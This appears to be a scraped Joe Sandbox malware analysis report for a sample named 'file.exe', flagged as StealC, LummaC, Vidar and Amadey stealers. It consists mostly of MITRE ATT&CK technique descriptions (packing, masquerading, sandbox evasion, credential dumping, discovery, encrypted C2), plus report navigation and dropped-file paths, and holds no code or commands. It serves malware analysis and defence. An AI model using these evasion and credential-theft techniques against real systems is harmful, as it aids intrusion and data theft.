Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\EHIDAKECFIEBGDHJEBKK

C:\ProgramData\HJJKFBGCFHCGDHIDAAEC

C:\ProgramData\IDHIEBAA

C:\ProgramData\KFIEHIII

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pisos23.exe_d5f4f6595dd7c0bfbfbc18d29c61499213dd57d_9fa41d80_b7095b5c-b953-47ab-838f-70afeb17e207\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB7EC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB84B.tmp.WERInternalMetadata.xml

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre